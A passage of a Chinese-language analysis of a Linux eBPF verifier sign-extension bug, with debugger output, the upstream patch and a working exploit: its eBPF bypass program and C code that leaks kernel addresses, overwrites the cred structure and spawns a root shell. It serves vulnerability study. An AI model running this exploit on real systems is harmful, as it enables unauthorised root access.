label v as discovered * 3 let S be a stack * 4 S.push(v) * 5 while S is not empty * 6 t <- S.pop() * 7 if t is what we're looking for: * 8 return t * 9 for all edges e in G.adjacentEdges(t) do * 10 if edge e is already labelled * 11 continue with the next edge * 12 w <- G.adjacentVertex(t,e) * 13 if vertex w is not discovered and not explored * 14 label e as tree-edge * 15 label w as discovered * 16 S.push(w) * 17 continue at 5 * 18 else if vertex w is discovered * 19 label e as back-edge * 20 else * 21 // vertex w is explored * 22 label e as forward- or cross-edge * 23 label t as explored * 24 S.pop() * * convention: * 0x10 - discovered * 0x11 - discovered and fall-through edge labelled * 0x12 - discovered and fall-through and branch edges labelled * 0x20 - explored */
可以看到检查的逻辑很多,这些都是为了避免攻击者注入恶意代码到内核,在这些所有检查完成之后,会调用__bpf_prog_run
函数来解码伪指令并运行,解码主要是通过一个表查找来进行的,不再展开,实现在kernel/bpf/core.c
中。
/** * __bpf_prog_run - run eBPF program on a given context * @ctx: is the data we are operating on * @insn: is the array of eBPF instructions * * Decode and execute eBPF instructions. */ static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn) { u64 stack[MAX_BPF_STACK / sizeof(u64)]; u64 regs[MAX_BPF_REG], tmp; static const void *jumptable[256] = { [0 ... 255] = &&default_label, /* Now overwrite non-defaults ... */ /* 32 bit ALU operations */ ...
漏洞主要是do_check中模拟寄存器所用的数据类型和实际执行函数中寄存器的数据类型不同,导致一些判断可以绕过do_check,执行攻击者注入的任意eBPF指令。这里以下面几条伪指令为例,第0条指令将立即数0xffffffff放到r9寄存器中,第1条指令(JNE)检查r9是否等于0xffffffff:相等则不跳转,向下继续执行[2],到[3]退出;不相等则跳转到[4]。在do_check函数中,exit是一条路径的结束,而检查时认为这条比较的结果恒为相等(跳转永远不会发生),因此不会把另一条路径([4]及之后的指令)压入栈,后面的指令也就不会被检查。
然而在__bpf_prog_run
函数中,寄存器是64位类型的变量:第0条的32位mov把r9置为0x00000000ffffffff,而第1条比较时32位有符号立即数被符号扩展为0xffffffffffffffff,两者不相等,导致[1]处的JNE跳转成立,可以执行[4]及后面未经检查的指令。
[0]: ALU_MOV_K(0,9,0x0,0xffffffff) [1]: JMP_JNE_K(0,9,0x2,0xffffffff) [2]: ALU64_MOV_K(0,0,0x0,0x0) [3]: JMP_EXIT(0,0,0x0,0x0) [4]: ......
这里我们直接去调试exp,定位到漏洞处的比较。在启动脚本中关掉kaslr,默认的内核加载地址是0xffffffff81000000
,用add-symbol-file ./vmlinux 0xffffffff81000000
,或者看一下__bpf_prog_run
的地址直接下断点运行exp,可以看到虽然低4字节相同,但是因为movsxd
的符号扩展,rdx被扩展为0xffffffffffffffff
,从而比较失败,继续执行L4后面的指令。
/ # cat /proc/kallsyms | grep -F "__bpf_prog_run" ffffffff8116f190 t __bpf_prog_run / # ./poc
[------------------------------------------------------------------------------] Legend: code, data, rodata, value ERROR: Could not find ELF base! ERROR: Could not find ELF base! 0xffffffff8116fa83 in ?? () LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ──────────────────────────[ REGISTERS ]─────────────────────────── RAX 0x2 RBX 0xffffc9000008a030L ◂— 0xffffffff00020255 RCX 0x0 RDX 0xffffffffffffffff RDI 0xffffffff RSI 0xffffc9000008a028L ◂— 0xffffffff000002b4 R8 0x0 R9 0x0 R10 0xffff88000d632000L ◂— add byte ptr [rax], al R11 0xffff88000f7639c0L ◂— 0x0 R12 0xffffffff81a32c20L —▸ 0xffffffff81170379L ◂— 0x4881a32c00c6c748 R13 0x0 R14 0xffff88000f7639c0L ◂— 0x0 R15 0x40 RBP 0xffff88000f733cb0L —▸ 0xffff88000f733cf8L —▸ 0xffff88000f733da0L —▸ 0xffff88000f733dc0L —▸ 0xffff88000f733e38L ◂— ... RSP 0xffff88000f733a30L —▸ 0xffff88000ec1a020L ◂— add byte ptr [rax], al RIP 0xffffffff8116fa83L ◂— 0x88c59439480fe083 ────────────────────────────[ DISASM ]──────────────────────────── 0xffffffff8116f7ad mov qword ptr [rbp + rax*8 - 0x278], rdi 0xffffffff8116f7b5 movzx eax, byte ptr [rbx] 0xffffffff8116f7b8 jmp qword ptr [r12 + rax*8] ↓ 0xffffffff8116fa7b movzx eax, byte ptr [rbx + 1] 0xffffffff8116fa7f movsxd rdx, dword ptr [rbx + 4] ► 0xffffffff8116fa83 and eax, 0xf 0xffffffff8116fa86 cmp qword ptr [rbp + rax*8 - 0x278], rdx 0xffffffff8116fa8e je 0xffffffff8117053c 0xffffffff8116fa94 movsx rax, word ptr [rbx + 2] 0xffffffff8116fa99 lea rbx, qword ptr [rbx + rax*8 + 8] 0xffffffff8116fa9e movzx eax, byte ptr [rbx] ────────────────────────────[ STACK ]───────────────────────────── 00:0000│ rsp 0xffff88000f733a30L —▸ 0xffff88000ec1a020L ◂— add byte ptr [rax], al 01:0008│ 0xffff88000f733a38L ◂— 0x0 02:0010│ 0xffff88000f733a40L —▸ 0xffff88000d632000L ◂— add byte ptr [rax], al 03:0018│ 0xffff88000f733a48L ◂— 0xffffffff 04:0020│ 0xffff88000f733a50L —▸ 0xffff88000f733b20L —▸ 0xffff88000f733b38L —▸ 0xffff88000f733b88L —▸ 0xffff88000f733bc8L ◂— ... 
05:0028│ 0xffff88000f733a58L —▸ 0xffffffff811e5d37L ◂— 0x102444c749 06:0030│ 0xffff88000f733a60L —▸ 0xffffffff811e4454L ◂— 0x1b808c48348 07:0038│ 0xffff88000f733a68L —▸ 0xffff88000ec1b1d0L ◂— add byte ptr [rax], al ──────────────────────────[ BACKTRACE ]─────────────────────────── ► f 0 ffffffff8116fa83 f 1 ffff88000ec1a020 f 2 0 gdb-peda$ i r rdx rdx 0xffffffffffffffff 0xffffffffffffffff gdb-peda$ x/gx $rbx+4 0xffffc9000008a034: 0x000000b7ffffffff gdb-peda$
exp的核心是eBPF指令,可以自己编写解码函数来解码,也可以通过llvm-objdump等一些工具对指令解码,这里直接搬运X3h1n师姐的解码结果分析。其中0~3指令用来绕过check。
4指令获取map地址到r9寄存器,5指令填充(因为8字节的地址需要用两条指令各4字节的imm字段来存储)。
6-13
指令取出map[0]
存储到r6寄存器中。同理14-21
取出map[1]
存储到r7寄存器,22-29
取出map[2]
存储到r8寄存器。
后面的指令可以分为三个部分,由r6即map[0]的值做区分:
[0]: ALU_MOV_K(BPF_REG_9, BPF_REG_0, 0x0, 0xffffffff) [1]: JMP_JNE_K(BPF_REG_9, BPF_REG_0, 0x2, 0xffffffff) [2]: ALU64_MOV_K(BPF_REG_0, BPF_REG_0, 0x0, 0x0) [3]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) [4]: LD_MAP_FD(BPF_REG_9, map_addr) [5]: bpf_map_padding [6]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0)//r1=r9 [7]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0)//r2=r10(rbp) [8]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc)//r2=r2-4 [9]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x0)//[rbp-4]=r0 [10]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0, BPF_FUNC_map_lookup_elem)//执行BPF_FUNC_map_lookup_elem [11]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0)//r0 != 0 [12]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)//exit [13]: LDX_MEM_DW(BPF_REG_6, BPF_REG_0, 0x0, 0x0)//r6=[r0]=map[0] [14]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0) [15]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0) [16]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc) [17]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x1) [18]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0, BPF_FUNC_map_lookup_elem) [19]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0) [20]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) [21]: LDX_MEM_DW(BPF_REG_7, BPF_REG_0, 0x0, 0x0) [22]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0) [23]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0) [24]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc) [25]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x2) [26]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0, BPF_FUNC_map_lookup_elem) [27]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0) [28]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) [29]: LDX_MEM_DW(BPF_REG_8, BPF_REG_0, 0x0, 0x0) [30]: ALU64_MOV_X(BPF_REG_2, BPF_REG_0, 0x0, 0x0)//r2=r0 [31]: ALU64_MOV_K(BPF_REG_0, BPF_REG_0, 0x0, 0x0)//r0=0 [32]: JMP_JNE_K(BPF_REG_6, BPF_REG_0, 0x3, 0x0)// if r6 != 0 jmp 36 [33]: LDX_MEM_DW(BPF_REG_3, BPF_REG_7, 0x0, 0x0)//r3=[r7] [34]: STX_MEM_DW(BPF_REG_2, BPF_REG_3, 0x0, 0x0)//[r2]=r3 [35]: 
JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)//exit [36]: JMP_JNE_K(BPF_REG_6, BPF_REG_0, 0x2, 0x1)//if r6 !=1 1 jmp 39 [37]: STX_MEM_DW(BPF_REG_2, BPF_REG_10, 0x0, 0x0)//[r2]=r10=rbp [38]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)//exit [39]: STX_MEM_DW(BPF_REG_7, BPF_REG_8, 0x0, 0x0)//[r7]=r8 [40]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)//exit
最终的漏洞利用步骤如下:
mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3, 0); if (mapfd < 0) { fail("failed to create bpf map: '%s'\n", strerror(errno)); } redact("sneaking evil bpf past the verifier\n"); progfd = load_prog(); if (progfd < 0) { if (errno == EACCES) { msg("log:\n%s", bpf_log_buf); } fail("failed to load prog '%s'\n", strerror(errno)); } redact("creating socketpair()\n"); if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) { fail("failed to create socket pair '%s'\n", strerror(errno)); } redact("attaching bpf backdoor to socket\n"); if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0) { fail("setsockopt '%s'\n", strerror(errno)); }
这个exp寻找cred时并不是通过thread_info
结构体中的task_struct
,而是通过泄露socket地址从另一个结构体变量中找到cred。在经典版本中,用的是泄露内核栈地址addr,然后用addr & ~(0x4000-1)
来找thread_info进而找cred。这个原理是内核栈和thread_info位置相邻,地址有对应关系。id_t uid = getuid(); unsigned long skbuff = get_skbuff(); unsigned long sock_addr = read64(skbuff + 24); msg("skbuff => %llx\n", skbuff); msg("Leaking sock struct from %llx\n", sock_addr); if(sock_addr < PHYS_OFFSET){ fail("Failed to find Sock address from sk_buff.\n"); } /* * scan forward for expected sk_rcvtimeo value. * * struct sock { * [...] * const struct cred *sk_peer_cred; * long sk_rcvtimeo; * }; */ for (int i = 0; i < 100; i++, sock_addr += 8) { if(read64(sock_addr) == 0x7FFFFFFFFFFFFFFF) { unsigned long cred_struct = read64(sock_addr - 8); if(cred_struct < PHYS_OFFSET) { continue; } unsigned long test_uid = (read64(cred_struct + 8) & 0xFFFFFFFF); if(test_uid != uid) { continue; } msg("Sock->sk_rcvtimeo at offset %d\n", i * 8); msg("Cred structure at %llx\n", cred_struct); msg("UID from cred structure: %d, matches the current: %d\n", test_uid, uid); return cred_struct; } }
static void hammer_cred(unsigned long addr) { msg("hammering cred structure at %llx\n", addr); #define w64(w) { write64(addr, (w)); addr += 8; } unsigned long val = read64(addr) & 0xFFFFFFFFUL; w64(val); w64(0); w64(0); w64(0); w64(0); w64(0xFFFFFFFFFFFFFFFF); w64(0xFFFFFFFFFFFFFFFF); w64(0xFFFFFFFFFFFFFFFF); #undef w64 } // main(){ //... if(execl("/bin/sh", "/bin/sh", NULL)) { fail("exec %s\n", strerror(errno)); } //... }
漏洞的patch如下(见kernel/git/torvalds/linux.git):
这里在check_alu_op(由do_check调用)里添加了对于BPF_ALU64
指令的判断,从而将64和32的比较区分开来,使得预先check和实际run code的检查环境一致,该漏洞无法再被利用。
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c index 625e358ca765..c086010ae51e 100644 --- a/kernel/bpf/verifier.c +++ b/kernel/bpf/verifier.c @@ -2408,7 +2408,13 @@ static int check_alu_op(struct bpf_verifier_env *env, struct bpf_insn *insn) * remember the value we stored into this reg */ regs[insn->dst_reg].type = SCALAR_VALUE; - __mark_reg_known(regs + insn->dst_reg, insn->imm); + if (BPF_CLASS(insn->code) == BPF_ALU64) { + __mark_reg_known(regs + insn->dst_reg, + insn->imm); + } else { + __mark_reg_known(regs + insn->dst_reg, + (u32)insn->imm); + } } } else if (opcode > BPF_END) {